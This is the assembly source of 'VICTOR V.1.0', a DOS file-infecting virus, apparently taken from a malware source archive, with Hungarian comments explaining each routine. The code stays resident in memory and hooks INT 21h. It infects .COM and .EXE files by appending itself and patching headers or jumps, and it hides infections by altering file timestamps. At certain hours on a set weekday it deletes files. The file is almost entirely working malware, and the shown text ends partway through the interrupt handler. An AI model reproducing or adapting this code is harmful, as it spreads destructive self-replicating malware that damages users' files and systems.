mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-21 10:56:10 +00:00
889 lines
29 KiB
NASM
889 lines
29 KiB
NASM
;************************************************
|
||
;* *
|
||
;* VICTOR V.1.0 *
|
||
;* The incredible high performance virus *
|
||
;* Length #98A bytes *
|
||
;* *
|
||
;************************************************
|
||
;
|
||
; 6 = bunteto sys file's time
|
||
; 8 = bunteto sys file's date
|
||
; 3f = Loaded .EXE header E... offset SS
|
||
; 41 = value SP
|
||
; 43 = chksum
|
||
; 45 = value IP
|
||
; 47 = offset CS
|
||
; 49 = SS init addr (relative to 0)
|
||
; 4B = SP init addr
|
||
; 4F = .EXE start point ofs (relative to 0)
|
||
; 51 = .EXE start point seg
|
||
; 53 = .exe size$ - header length
|
||
; 59 = .EXE file logikai merete /felkerekitve egy $ al, $ hatar/
|
||
; 5B = --""--
|
||
; 5D = .exe size length mod 512
|
||
; 5F = .exe size length div 512
|
||
; 61 = Loaded .EXE header length $ mod 512
|
||
; 63 = PSP seg
|
||
; 65 = psp seg
|
||
; 72 = ido tarolohely hi=sec, lo=1/100 sec
|
||
; B 74 = jelzo a bunteto rendszerben talalt file 1=COM,0=EXE
|
||
; 75 = a bunteto rendszerben a talalt file attributuma
|
||
; 77 = DOS fatal error ofs
|
||
; 79 = DOS fatal error seg
|
||
; 7B = DTA ofs
|
||
; 7D = DTA seg
|
||
; 7F = PSP seg
|
||
; B 81 = A sajat file f9=.EXE/f8=.COM (default)
|
||
; 82 = INT_21 ofs
|
||
; 84 = INT_21 seg
|
||
; 86 = az FFFF funkciora dos-tol visszakapott ertek
|
||
; 88 = seg PSP:100 / PSP
|
||
; 8C = env-en beluli offset sajat nev
|
||
; 8E = SS save area
|
||
; 90 = SP save area
|
||
; 92
|
||
; | Parameter Block for Load
|
||
; 9E
|
||
; B A2 = INT_21 second
|
||
; B A3 = INT_21 minute
|
||
; A4 = INT_21 SS save
|
||
; A6 = INT_21 SP save
|
||
; A8 = flag 1=child process in action 0=foprocess
|
||
; A9 = INT_21 original AX
|
||
; B B1 = idopont flag Pentek 9,11,13,15 idopontokban 1 /0
|
||
; B B2 = day of week (0=sun ... 6=sat)
|
||
; B BA = f8 (default .COM file) f9=exe
|
||
;
|
||
XSEG SEGMENT
|
||
ASSUME CS:XSEG
|
||
XPROC PROC FAR
|
||
CALL L00B4 ;eloszor egy jmp x-el a virus indul el
|
||
db ?,?,? ;a program elso 3 byte-ja
|
||
db ? dup (?) ;adatterulet
|
||
L00B4: POP SI
|
||
SUB SI,3
|
||
CLI
|
||
CLD
|
||
CLC
|
||
JC L00EB
|
||
PUSH SI
|
||
ADD SI,3
|
||
CLD
|
||
MOV DI,100H ;restauracio
|
||
MOVSW
|
||
MOVSB
|
||
POP SI
|
||
MOV AX,CS
|
||
MOV BX,AX
|
||
MOV CL,4
|
||
SHR SI,CL
|
||
ADD AX,SI ;ax=virus kezdet szegmens
|
||
PUSH AX
|
||
MOV AX,0D8H
|
||
PUSH AX
|
||
DB 0CBH ;RETF
|
||
;cont...
|
||
MOV CS:[7FH],BX ;eredeti PSP addr
|
||
MOV CS:[63H],BX
|
||
MOV AX,CS
|
||
MOV DS,AX
|
||
MOV ES,AX ;atteres a virus szegmensre
|
||
JMP L010A
|
||
;L00EB:
|
||
; MOV CS:[0063H],DS
|
||
; MOV AX,CS
|
||
; MOV DS,AX
|
||
; MOV ES,AX
|
||
; MOV AX,WORD PTR DS:[0063H]
|
||
; ADD AX,0010H
|
||
; MOV WORD PTR DS:[0065H],AX
|
||
; MOV SI,003FH
|
||
; MOV DI,0049H
|
||
; MOV CX,0005H
|
||
; MOVSW
|
||
;
|
||
|
||
;
|
||
; A virus ellenorzi a DOS verziot, ha ez nem megfelelo _exec.
|
||
; Ha a virus meg nincs a memoriaban _copy0
|
||
; Ha mar bent van _exec
|
||
;
|
||
L010A: MOV AL,DS:[00BAH]
|
||
MOV DS:[0081H],AL
|
||
MOV AH,30H ;DOS version
|
||
INT 21H
|
||
CMP AL,3
|
||
JZ vers_ok
|
||
MOV CX,0FEC1H
|
||
MOV DS:[0086H],CX
|
||
JMP _exec
|
||
vers_ok:MOV AX,0FFFFH ;Mar a memoriaban van ?
|
||
MOV BX,0FF0H
|
||
INT 21H
|
||
MOV DS:[0086H],CX
|
||
CMP CX,0FEC1H
|
||
JNZ _copy0
|
||
JMP _exec
|
||
;
|
||
; _copy0: a virus elhelyezese a memoriaban
|
||
;
|
||
; A virus meg nincs a memoriaban.
|
||
; Megkeresi a saja nevet a kesobbieknek es megnezi hogy sajat maga elerheto-e.
|
||
; A memoriablokkja elejere masolja a virust .COM, es .EXE file-oknak
|
||
; megfeleloen. Ezek utan _exec.
|
||
;
|
||
_copy0:
|
||
PUSH ES
|
||
MOV AX,DS:[063H] ;A program ENV-je
|
||
MOV ES,AX
|
||
MOV AX,ES:[02CH]
|
||
MOV DS:[8AH],AX
|
||
PUSH DS
|
||
MOV AX,DS:[8AH]
|
||
MOV DS,AX
|
||
MOV ES,AX
|
||
XOR DI,DI
|
||
MOV AL,1
|
||
MOV CX,01F4H
|
||
REPNE SCASB
|
||
INC DI
|
||
POP DS
|
||
POP ES
|
||
MOV DS:[8CH],DI ;Sajat fertozott programom neve
|
||
PUSH DS
|
||
MOV DX,DI
|
||
MOV AX,DS:[008AH]
|
||
MOV DS,AX
|
||
MOV AX,3D00H ;Open File = Sajat magam
|
||
INT 21H
|
||
POP DS
|
||
JNC L0175
|
||
MOV DS:[86H],0FEC1H
|
||
JMP _exec
|
||
L0175: MOV BX,AX ;Close File
|
||
MOV AH,3EH
|
||
INT 21H
|
||
CMP BYTE PTR DS:[081H],0F9H
|
||
JZ exe_file ;Az exe-t 0-ra kell masolni
|
||
MOV AX,DS:[007FH]
|
||
MOV DS:[0065],AX
|
||
MOV ES,AX
|
||
ADD AX,0010H
|
||
MOV WORD PTR DS:[0088H],AX ;ES=PSP:100
|
||
XOR SI,SI
|
||
MOV DI,0100H ;eddig a virus a mem vegen volt
|
||
MOV CX,098AH ;Atmasolja a virust PSP:100 ra
|
||
REP MOVSB
|
||
PUSH AX
|
||
MOV AX,01B7H
|
||
PUSH AX
|
||
DB 0CBH ;A vezerles a PSP:100 ban!!! to:1
|
||
;
|
||
; .EXE program eseten nem kell lehet 100H ra tenni.
|
||
;
|
||
exe_file:
|
||
MOV AX,DS:[0065H] ;normal psp:
|
||
MOV ES,AX
|
||
MOV DS:[0088H],AX
|
||
XOR SI,SI
|
||
XOR DI,DI
|
||
MOV CX,098AH ;A virus szegmensbol a psp: re
|
||
REP MOVSB ; atmasolja a virust.
|
||
PUSH AX
|
||
MOV AX,01B7H
|
||
PUSH AX
|
||
DB 0CBH; RETF
|
||
; cont from 1
|
||
;
|
||
; _exec: blow/install/run_original
|
||
;
|
||
; 1. Esetleges kartekonykodas.
|
||
; 2. a, Ha a virus mar a memoriaban van, lefuttatja az
|
||
; eredeti programot. /ez a tarban van, csupan a vezerlest kell raadni./
|
||
; b, Ha meg nincs a memoriaban, akkor atveszi a rendszertol
|
||
; a vezerlest. /ezutan barmilyen DOS fn-kerelmet ellenorizhet, vagy
|
||
; tetszese szerint hatasaban megvaltoztathat./ Ennel a megvalositasnal
|
||
; a virus felulirta a betoltott programot, hogy a memoriablokk tetejen
|
||
; lehessen. Igy kenytelen a dos program betolto-lefuttato funkciojat
|
||
; hasznalni, hogy lefuttassa a programot. A vezerlest visszakapva magat
|
||
; rezidensse teszi magat, es kilep a DOS-ba /KEEP funkcio./
|
||
;
|
||
; /a hasznalata elott szukseges _copy0, ha meg nem rezidens a virus./
|
||
;
|
||
;
|
||
MOV AX,CS ;cs=psp:100
|
||
MOV DS,AX
|
||
MOV ES,AX
|
||
MOV SS,AX
|
||
MOV SP,08F3H
|
||
_exec: MOV AH,2CH ;Get Time
|
||
INT 21H
|
||
MOV DS:[0072H],DX ;seconds/hundredths
|
||
MOV AH,2CH
|
||
INT 21H
|
||
MOV CL,DL
|
||
AND CL,0FH
|
||
ROL DS:[0072H],CL
|
||
TEST WORD PTR DS:[0072H],1 ;Veletlen esemeny
|
||
JE L01E2
|
||
JMP L01E5
|
||
L01E2: CALL _working ;???? kartekonykodhat...
|
||
L01E5: CMP WORD PTR DS:[86H],0FEC1H;Meg nincs installalva de _copy0 volt
|
||
JNZ _inst
|
||
JMP run_prg ;a program tarban van, ugorj ra!
|
||
_inst: MOV DX,DS:[0088H] ;seg(PSP:100) - PSP = 10
|
||
SUB DX,DS:[0065H]
|
||
MOV BX,098AH ;Virus length in paragraphs
|
||
MOV CL,04H
|
||
SHR BX,CL
|
||
INC BX
|
||
ADD DX,BX
|
||
ADD DX,10H
|
||
MOV DS:[00A0H],DX
|
||
PUSH ES
|
||
MOV ES,DS:[0063H] ;A sajat memoriablokkom merete csokken,
|
||
MOV BX,DS:[00A0H] ; pont annyi lesz, ahova befer a virus
|
||
MOV AX,4A00H ; PSP vel egyutt meg + $10
|
||
INT 21H ;/mivel bemasoltuk, ez ott van/
|
||
POP ES
|
||
PUSH ES
|
||
MOV AX,3521H ;Get INT_21 vector
|
||
INT 21H
|
||
MOV DS:[0082H],BX
|
||
MOV DS:[0084H],ES
|
||
POP ES
|
||
MOV DX,06B3H ;Set INT_21 vector
|
||
MOV AX,2521H
|
||
INT 21H
|
||
MOV BYTE PTR DS:[00A8H],1 ;=child process flag
|
||
PUSH ES ;Prepare for Load/Exec self
|
||
PUSH DS
|
||
MOV DS:[008EH],SS
|
||
MOV DS:[0090H],SP
|
||
MOV AX,WORD PTR DS:[008AH] ;Az L/E egy uj memoriablokkot hoz
|
||
MOV WORD PTR DS:[0092H],AX ;letre /a virusprogram felett/
|
||
MOV AX,WORD PTR DS:[0063H] ;exitnel csak az altala lefoglalt
|
||
MOV WORD PTR DS:[0096H],AX ;blokk szabadul fel, a virus bent
|
||
MOV WORD PTR DS:[009AH],AX ;marad tovabbra is.
|
||
MOV WORD PTR DS:[009EH],AX
|
||
MOV BX,0092H
|
||
MOV DX,DS:[008CH]
|
||
MOV AX,WORD PTR DS:[008AH]
|
||
MOV DS,AX
|
||
MOV AX,4B00H
|
||
INT 21H
|
||
MOV AX,WORD PTR CS:[008EH] ;A kilepeskor felszabadult a futtato
|
||
MOV SS,AX ;blokk, es visszakaptam a vezerlest.
|
||
MOV SP,CS:[0090H]
|
||
POP DS
|
||
POP ES
|
||
MOV BYTE PTR DS:[00A8H],0 ;Process flag
|
||
MOV DX,DS:[00A0H]
|
||
MOV AX,3100H ;Terminate process and remain resident
|
||
INT 21H ;(KEEP)
|
||
; Akkor hajtodik vegre, ha a virus mar bent van a memoriaban
|
||
run_prg:
|
||
CMP BYTE PTR CS:[81H],0F8H ;.COM program
|
||
JNZ run_exe
|
||
JMP run_com
|
||
run_exe:MOV DX,DS:[0065H] ;PSP
|
||
ADD DS:[0051H],DX ;Inditasi szegmens
|
||
MOV AX,WORD PTR DS:[0049H] ;SS relative
|
||
ADD AX,DX ;Setup Stack
|
||
MOV SS,AX
|
||
MOV SP,DS:[004BH]
|
||
MOV AX,WORD PTR DS:[0063H] ;Default PSP
|
||
MOV DS,AX
|
||
MOV ES,AX
|
||
STI
|
||
JMP DWORD PTR CS:[004FH] ;EXE Start point
|
||
; .COM program kornyezet beallitas, es lefuttatas PSP:100
|
||
run_com:MOV AX,WORD PTR DS:[007FH] ;Default PSP
|
||
MOV DS,AX
|
||
MOV ES,AX
|
||
STI
|
||
PUSH AX
|
||
MOV AX,0100H
|
||
PUSH AX
|
||
DB 0CBH; RETF
|
||
;
|
||
; Kartekony: letorol egy par file-t, vagy fertoz
|
||
;
|
||
_working:
|
||
MOV CX,DS:[0072H] ;Veletlen kezdoertek 1..4 ciklus
|
||
AND CX,3
|
||
INC CX
|
||
delet: PUSH CX
|
||
CALL L02C5
|
||
POP CX
|
||
LOOP delet
|
||
DB 0C3H; RET
|
||
;
|
||
L02C5: MOV AH,2AH ;Get Date
|
||
INT 21H
|
||
MOV DS:[00B2H],AL ;Day of Week
|
||
PUSH ES
|
||
MOV AH,2FH ;Get DTA
|
||
INT 21H
|
||
MOV DS:[007BH],BX
|
||
MOV DS:[007DH],ES
|
||
POP ES
|
||
MOV DX,0014H ;Set DTA
|
||
MOV AH,1AH
|
||
INT 21H
|
||
PUSH ES
|
||
MOV AX,3524H ;Get Dos Fatal Error vector
|
||
INT 21H
|
||
MOV DS:[0077H],BX
|
||
MOV DS:[0079H],ES
|
||
POP ES
|
||
MOV DX,00B3H
|
||
MOV AX,2524H ;Set Fatal Error to : IRET
|
||
INT 21H
|
||
MOV CX,0FFE3H
|
||
MOV DX,000AH ;Search for first :*.*
|
||
MOV AH,4EH
|
||
INT 21H
|
||
JNC _kezd
|
||
JMP io_err ; reset DTA, fatal error, RET
|
||
_kezd: MOV AH,2CH ;Set randomizer
|
||
INT 21H
|
||
MOV DS:[0072H],DX
|
||
MOV AH,2CH
|
||
INT 21H
|
||
MOV CL,DL
|
||
AND CL,0FH
|
||
ROL DS:[0072H],CL
|
||
MOV AH,2CH ;Get Time
|
||
INT 21H
|
||
XOR DS:[0072H],DX
|
||
MOV BYTE PTR DS:[00B1H],0 ;idopont-flag
|
||
CMP BYTE PTR DS:[00B2H],3 ;Milyen nap van?
|
||
JNZ no_date
|
||
CMP CH,9 ;Pentek 9h,11h,13h,15h-nal
|
||
JZ kill ; kimeletlenul letorol fileokat
|
||
CMP CH,0BH
|
||
JZ kill ;maskor neha megnezi hogy com/exe-e.
|
||
CMP CH,0DH
|
||
JZ kill
|
||
CMP CH,0FH
|
||
JNZ no_date
|
||
kill: MOV BYTE PTR DS:[00B1H],1 ;A datum megfelelo
|
||
no_date:TEST WORD PTR DS:[0072H],30H
|
||
JNZ _1
|
||
JMP d_next
|
||
_1: CMP BYTE PTR DS:[00B1H],1
|
||
JNZ look_run
|
||
MOV DX,0032H ;Megfelel az idopont, es sajnos...
|
||
MOV CX,0020H
|
||
MOV AX,4301H
|
||
INT 21H ;change file mode to normal
|
||
JNB _del
|
||
JMP io_err
|
||
_del: MOV DX,0032H ;UNLINK file
|
||
MOV AH,41H
|
||
INT 21H
|
||
JMP io_err
|
||
;
|
||
; Ha futtathato .COM v .EXE a talalt file akkor megfertozi ha meg nincs,
|
||
; egyebkent keres egy masik file-t. /1 lehetoseget ad/
|
||
;
|
||
look_run:
|
||
MOV DI,0032H ;A penteki kritikus idon kivul
|
||
XOR AL,AL ;akar fertozhet is
|
||
MOV CX,003FH
|
||
REPNE SCASB
|
||
SUB DI,+04H
|
||
MOV BP,DI
|
||
MOV SI,DI
|
||
MOV CX,0003H ;ez egy .COM volt ???
|
||
MOV DI,000EH
|
||
REPE CMPSB
|
||
JZ _dcom
|
||
MOV SI,BP
|
||
MOV CX,0003H ;vagy egy .EXE ???
|
||
MOV DI,0011H
|
||
CMPSB
|
||
JZ _dexe
|
||
JMP d_next ;nem futtathato file, ujat
|
||
_dcom: MOV BYTE PTR DS:[0074H],1
|
||
JMP _d
|
||
_dexe: MOV BYTE PTR DS:[0074H],0
|
||
_d: MOV DX,0032H ;Get file attr
|
||
MOV AX,4300H
|
||
INT 21H
|
||
JNB _2
|
||
JMP io_err
|
||
_2: MOV DS:[0075H],CX
|
||
MOV DX,0032H ;Set normal attr
|
||
MOV CX,0020H
|
||
MOV AX,4301H
|
||
INT 21H
|
||
JNC L03CD
|
||
JMP io_err
|
||
L03CD: MOV DX,0032H ;Open file
|
||
MOV AX,3D02H
|
||
INT 21H
|
||
JNB L03DA
|
||
JMP io_err
|
||
L03DA: MOV BX,AX
|
||
MOV AX,5700H ;Get file date/time
|
||
INT 21H ;a fertozott fileok ideje oszthato 8-al
|
||
JNB _3
|
||
JMP io_err
|
||
_3: MOV DS:[0006H],CX
|
||
MOV DS:[0008H],DX
|
||
TEST CX,0007H
|
||
JZ dft_ok
|
||
JMP fertoz ;ha nem oszthato 8-al, nincs fertozve
|
||
dft_ok: TEST WORD PTR DS:[72H],43H ;meg bizonytalankodik
|
||
JZ d_mehet
|
||
JMP d_clnxt
|
||
d_mehet:MOV CX,0FFFFH ;LSEEK EOF - 6
|
||
MOV DX,0FFFAH
|
||
MOV AX,4202H
|
||
INT 21H
|
||
JNB dls_ok
|
||
JMP io_err
|
||
dls_ok: MOV CX,0006H ;Read file's last 6 byte
|
||
MOV DX,00ABH
|
||
MOV AH,3FH
|
||
INT 21H
|
||
JNC drd_ok
|
||
JMP io_err
|
||
drd_ok: MOV CX,0003H ;megegyezik valamivel
|
||
MOV SI,0984H ;/mar fertozott/
|
||
MOV DI,00ABH
|
||
REPE CMPSW
|
||
JZ d_clnxt
|
||
JMP fertoz
|
||
d_clnxt: ;Close and Next
|
||
MOV AH,3EH
|
||
INT 21H
|
||
JNB d_attrs
|
||
JMP io_err
|
||
dattrs: MOV CX,DS:[0075H] ;Reset attr
|
||
MOV DX,0032H
|
||
MOV AX,4301H
|
||
INT 21H
|
||
JNC d_next
|
||
JMP io_err
|
||
;
|
||
; Probal ujabb file-t keresni
|
||
;
|
||
d_next: TEST WORD PTR DS:[0072H],2CH ;meg egy lehetosege van
|
||
JNZ _dsnext
|
||
JMP io_err
|
||
_dsnext:MOV AH,4FH
|
||
INT 21H
|
||
JNC _dnxtok
|
||
JMP io_err
|
||
_dnxtok:JMP _kezd
|
||
;
|
||
; A fertozott file jellemzoi: /.COM v .EXE /
|
||
;
|
||
; Csak olyan file-okat fertoz meg melyek hossza nagyobb a virusenal.
|
||
; A tul nagy .COM fileokat nem bantja.
|
||
; File ido oszthato 8-al
|
||
; File vegen levo virus azonosito (6 byte ea80492502. )
|
||
;
|
||
fertoz: XOR CX,CX
|
||
XOR DX,DX
|
||
MOV AX,4202H ;LSEEK eof
|
||
INT 21H
|
||
JNC _4
|
||
JMP io_err
|
||
_4: AND DX,DX
|
||
JNZ d_selct
|
||
CMP AX,098AH ;csak a virusnal nagyobbak jok
|
||
JNC d_selct
|
||
JMP d_clnxt
|
||
d_selct:CMP BYTE PTR DS:[0074H],1
|
||
JNZ df_exe
|
||
JMP df_com
|
||
;
|
||
; .EXE file megfertozese
|
||
;
|
||
; 1. Beolvassa a File hosszat mod 512 (+2) es a tobbi informaciot
|
||
; 2. A file vegere /size felkerekitett $, $ hatar/ felirja a virus-testet
|
||
; 3. Kiszamitja a kod hosszat = eredeti_file_size$ - header_size ,
|
||
; es ez lesz erteke az uj +SS,+CS nek, IP=0.
|
||
; /az eredeti exe kod moge, pont a virusra mutat/
|
||
; 4. Felirja az uj Header informaciot.
|
||
; 5. Megallapitja az uj filehossz div,mod 512-t
|
||
; 6. Felirja a headerbe (+2)
|
||
; 7. Visszaallitja a file-idot (div 8) es a file attributumot
|
||
;
|
||
df_exe:
|
||
MOV BYTE PTR CS:[BAH],0F9H ;.EXE file
|
||
XOR CX,CX
|
||
MOV DX,0008H
|
||
MOV AX,4200H ;LSEEK 8: Size of header $
|
||
INT 21H
|
||
JNB _5
|
||
JMP io_err
|
||
_5: MOV CX,0002H ;READ Size of header mod 512
|
||
MOV DX,0061H
|
||
MOV AH,3FH
|
||
INT 21H
|
||
JNC _6
|
||
JMP io_err
|
||
_6: XOR CX,CX ;LSEEK E: Offset of SS
|
||
MOV DX,000EH
|
||
MOV AX,4200H
|
||
INT 21H
|
||
JNC _7
|
||
JMP io_err
|
||
_7: MOV CX,000AH ;Read header information
|
||
MOV DX,003FH
|
||
MOV AH,3FH
|
||
INT 21H
|
||
JNC _8
|
||
JMP io_err
|
||
_8: XOR CX,CX
|
||
XOR DX,DX
|
||
MOV AX,4202H ;LSEEK eof
|
||
INT 21H
|
||
JNB _9
|
||
JMP io_err
|
||
_9: MOV CX,DX
|
||
MOV DX,AX ;a meret felkerekitve egy $-al
|
||
ADD DX,+10H ;mindig $ hatar
|
||
ADC CX,+00H
|
||
AND DX,-10H
|
||
MOV AX,4200H
|
||
INT 21H ;Elmegy a file vegere /maga szerint/
|
||
JNB _10
|
||
JMP io_err
|
||
_10: MOV DS:[005BH],DX
|
||
MOV DS:[0059H],AX
|
||
MOV CX,098AH
|
||
XOR DX,DX ;Felirja a virus-testet
|
||
MOV AH,40H
|
||
INT 21H
|
||
JNB L0501
|
||
JMP io_err
|
||
L0501: CMP AX,CX
|
||
JE L0508
|
||
JMP io_err
|
||
L0508: MOV DX,DS:[005BH] ;size HI max. 000x x=0..f hexad.
|
||
MOV CL,0CH
|
||
SHL DX,CL
|
||
MOV AX,DS:[0059H] ;size LO
|
||
MOV CL,04H
|
||
SHR AX,CL
|
||
OR DX,AX
|
||
SUB DX,DS:[0061H]
|
||
MOV DS:[005BH],DX ;size $ - header_length = code_length$
|
||
MOV DS:[0053H],DX
|
||
MOV WORD PTR DS:[0059H],0
|
||
XOR CX,CX
|
||
MOV DX,000EH ;LSEEK E:
|
||
MOV AX,4200H
|
||
INT 21H
|
||
JNB L053A
|
||
JMP io_err
|
||
L053A: MOV CX,000AH ;WRITE UP new Header Info
|
||
MOV DX,0053H ;
|
||
MOV AH,40H ; new SS ofs = file moge mutat
|
||
INT 21H ; new IP = 0
|
||
JNB L0549 ; new CS ofs = file moge mutat
|
||
JMP io_err
|
||
NOP
|
||
L0549: XOR CX,CX ;LSEEK EOF
|
||
XOR DX,DX
|
||
MOV AX,4202H
|
||
INT 21H
|
||
JNB L0557
|
||
JMP io_err
|
||
NOP
|
||
L0557: ADD AX,01FFH ;Totalsize = exesize + virus
|
||
ADC DX,0 ;felkerekiti 512-re
|
||
MOV DH,DL
|
||
MOV DL,AH ;DX= DL AH
|
||
XOR AH,AH
|
||
SHR DX,1 ; ez lesz a hanyados
|
||
ADC AH,0
|
||
MOV WORD PTR DS:[005DH],AX ; 256/0 maradek
|
||
MOV DS:[005FH],DX
|
||
XOR CX,CX ;LSEEK 2: size mod 512
|
||
MOV DX,0002H
|
||
MOV AX,4200H
|
||
INT 21H
|
||
JNB L057E
|
||
JMP io_err
|
||
NOP
|
||
L057E: MOV CX,0004H ;WRITE up size mod 512
|
||
MOV DX,005DH ; size div 512
|
||
MOV AH,40H
|
||
INT 21H
|
||
JNB L058D
|
||
JMP SHORT io_err
|
||
NOP
|
||
L058D: MOV CX,DS:[0006H] ;Set Original file time
|
||
MOV DX,DS:[0008H] ;kiveve time oszthato 8-al
|
||
AND CX,-08H
|
||
MOV AX,5701H
|
||
INT 21H
|
||
JNB L05A2
|
||
JMP SHORT io_err
|
||
NOP
|
||
L05A2: MOV AH,3EH ;Close
|
||
INT 21H
|
||
JNB L05AB
|
||
JMP SHORT io_err
|
||
NOP
|
||
L05AB: MOV CX,DS:[0075H] ;Reset attr
|
||
MOV DX,0032H
|
||
MOV AX,4301H
|
||
INT 21H
|
||
JMP io_err
|
||
;
|
||
; I/O error
|
||
;
|
||
io_err: PUSH DS
|
||
MOV DX,DS:[007BH]
|
||
MOV AX,DS:[007DH]
|
||
MOV DS,AX ;Reset DTA
|
||
MOV AH,1AH
|
||
INT 21H
|
||
POP DS
|
||
PUSH DS
|
||
MOV DX,DS:[0077H]
|
||
MOV AX,DS:[0079H] ;Reset Fatal Error vector
|
||
MOV DS,AX
|
||
MOV AX,2524H
|
||
INT 21H
|
||
POP DS
|
||
DB 0C3H; RET
|
||
;
|
||
; A .COM file megfertozese:
|
||
;
|
||
; 1. Ellenorzi, hogy nem lesz-e tul nagy a .COM file a virussal egyutt.
|
||
; 2. Eltarolja adatteruletere a file elso 3 byte-jat /ezt fogja kicserelni/
|
||
; 3. A file vege utan /felkerekiti egy $-al,mindig $-hatar/ felirja a
|
||
; virus-testet.
|
||
; 4. A file elejere felirja a JMP v_start utasitast. v_start = filesize + 3
|
||
; 5. Visszaallitja a file-idot azon modositassal, hogy mindig oszthato 8-al
|
||
; /ez egy jel amirol gyorsabban ismerheti fel a mar fertozott prg-kat/,
|
||
; es az eredeti file-attributumot.
|
||
;
|
||
df_com:
|
||
MOV BYTE PTR CS:[BAH],0F8H ;.COM file
|
||
XOR DX,DX
|
||
XOR CX,CX
|
||
MOV AX,4202H ;LSEEK EOF
|
||
INT 21H
|
||
JNB _c1
|
||
JMP SHORT io_err
|
||
_c1: MOV CX,0FC80H ;nem tul nagy-e a file (max 64K COM)
|
||
SUB CX,098AH
|
||
CMP AX,CX
|
||
JB _csoz
|
||
JMP d_clnxt
|
||
_csok: XOR DX,DX
|
||
XOR CX,CX
|
||
MOV AX,4200H ;LSEEK START
|
||
INT 21H
|
||
JNB _crd3
|
||
JMP SHORT io_err
|
||
_crd3: MOV CX,0003H ;READ FILE'S FIRST 3 byte
|
||
MOV DX,0003H ;(ezt fogja lecserelni az ugrasra)
|
||
MOV AH,3FH ;ds:3 ra azaz a virustestbe
|
||
INT 21H
|
||
JNB _crdok
|
||
JMP SHORT io_err
|
||
_crdok: CMP AX,CX
|
||
JZ _crdok1
|
||
JMP SHORT io_err
|
||
_crdok1:XOR CX,CX ;LSEEK EOF
|
||
XOR DX,DX
|
||
MOV AX,4202H
|
||
INT 21H
|
||
JNC _cls1ok
|
||
JMP io_err
|
||
_cls1ok:MOV BP,AX ; (size + 10h) AND -10h =
|
||
ADD BP,+10H
|
||
AND BP,-10H ; felkerekiti egy $-al a size-t
|
||
XOR CX,CX
|
||
MOV DX,BP
|
||
MOV AX,4200H ; es elmegy ide /over EOF/
|
||
INT 21H
|
||
JNB _covr
|
||
JMP io_err
|
||
_covr: MOV CX,098AH ;WRITE felirja a virustestet
|
||
XOR DX,DX
|
||
MOV AH,40H
|
||
INT 21H
|
||
JNB _cwrok
|
||
JMP io_err
|
||
_cwrok: CMP AX,CX
|
||
JZ _cwr1ok
|
||
JMP io_err
|
||
_cwrok1:XOR DX,DX ;LSEEK START
|
||
XOR CX,CX
|
||
MOV AX,4200H
|
||
INT 21H
|
||
JNB L0664
|
||
JMP io_err
|
||
L0664: MOV BYTE PTR DS:[0003H],0E9H
|
||
SUB BP,+03H ;WRITE jmp virus (size+3)
|
||
MOV DS:[0004H],BP
|
||
MOV CX,0003H
|
||
MOV DX,0003H
|
||
MOV AH,40H
|
||
INT 21H
|
||
JNB L067F
|
||
JMP io_err
|
||
L067F: CMP AX,CX
|
||
JE L0686
|
||
JMP io_err
|
||
L0686: MOV CX,DS:[0006H] ;Set file Date/Time
|
||
MOV DX,DS:[0008H] ;A FERTOZOTT FILE IDEJE OSZTHATO 8-AL
|
||
AND CX,-08H ;CX = xxxxx000
|
||
MOV AX,5701H
|
||
INT 21H
|
||
JNB L069B
|
||
JMP io_err
|
||
L069B: MOV AH,3EH ;Close file
|
||
INT 21H
|
||
JNB L06A4
|
||
JMP io_err
|
||
L06A4: MOV CX,DS:[0075H] ;Set original file attr
|
||
MOV DX,0032H
|
||
MOV AX,4301H
|
||
INT 21H
|
||
JMP io_err ;befejezodott a fertozes
|
||
|
||
;*******************************
|
||
;* *
|
||
;* A rezidens INT_21 funkcio *
|
||
;* *
|
||
;*******************************
|
||
|
||
CMP AX,0FFFFH ;virus funkcio: install_stat
|
||
JNE L06C2
|
||
CMP BX,0FF0H
|
||
JNE L06C2
|
||
MOV CX,0FEC1H ;visszaadja az install-kodot
|
||
IRET
|
||
L06C2: CMP AH,3EH ;CLOSE
|
||
JE L0710
|
||
CMP AH,41H ;UNLINK
|
||
JE L0710
|
||
CMP AH,3CH ;CREAT
|
||
JE L0710
|
||
CMP AH,42H ;LSEEK
|
||
JE L0710
|
||
CMP AH,43H ;CHMOD
|
||
JE L0710
|
||
CMP AH,4BH ;L/E
|
||
JE L0710
|
||
CMP AH,4EH ;FFIRST
|
||
JE L0710
|
||
CMP AH,4FH ;FNEXT
|
||
JE L0710
|
||
CMP AH,5BH ;CREATE
|
||
JE L0710
|
||
CMP AH,39H ;MKDIR
|
||
JE L0710
|
||
CMP AH,3AH ;RMDIR
|
||
JE L0710
|
||
CMP AH,3BH ;CHDIR
|
||
JE L0710
|
||
CMP AH,3DH ;OPEN
|
||
JE L0710
|
||
CMP AH,3FH ;READ
|
||
JE L0710
|
||
CMP AH,40H ;WRITE except BX=1 stdout
|
||
JE L0710
|
||
JMP jmp_dos
|
||
L0710:
|
||
CMP BYTE PTR CS:[00A8H],1 ;Ha Child processben vagyunk
|
||
JNE L071B ;mindent beken kell hagyni...
|
||
JMP jmp_dos
|
||
L071B: CMP AH,40H ;FN = WRITE, handle=1 (print)
|
||
JNE L0728 ; nem bantja
|
||
CMP BX,+01H
|
||
JNE L0728
|
||
JMP jmp_dos ;to dos
|
||
L0728:
|
||
MOV CS:[00A9H],AX
|
||
MOV CS:[00A4H],SS
|
||
MOV CS:[00A6H],SP
|
||
MOV AX,CS
|
||
MOV SS,AX
|
||
MOV SP,08F3H
|
||
PUSH ES
|
||
PUSH DS
|
||
PUSH AX
|
||
PUSH BX
|
||
PUSH CX
|
||
PUSH DX
|
||
PUSH SI
|
||
PUSH DI
|
||
PUSH BP
|
||
MOV AX,CS
|
||
MOV DS,AX
|
||
MOV ES,AX
|
||
PUSH DS
|
||
MOV DX,DS:[0082H]
|
||
MOV AX,DS:[0084H]
|
||
MOV DS,AX
|
||
MOV AX,2521H ;Visszaallitja az eredeti
|
||
INT 21H ; DOS hivas lehetoseget
|
||
POP DS ; a rutinon belul
|
||
NOP
|
||
NOP
|
||
NOP
|
||
NOP
|
||
MOV AH,2CH ;Randomize
|
||
INT 21H
|
||
MOV DS:[0072H],DX
|
||
MOV AH,2CH
|
||
INT 21H
|
||
MOV CL,DL
|
||
AND CL,0FH
|
||
ROL DS:[0072H],CL
|
||
MOV AH,2CH
|
||
INT 21H
|
||
XOR DS:[0072H],DX
|
||
MOV AH,2CH
|
||
INT 21H
|
||
CMP CL,DS:[00A3H]
|
||
JZ L0792
|
||
MOV DS:[00A3H],CL ;min
|
||
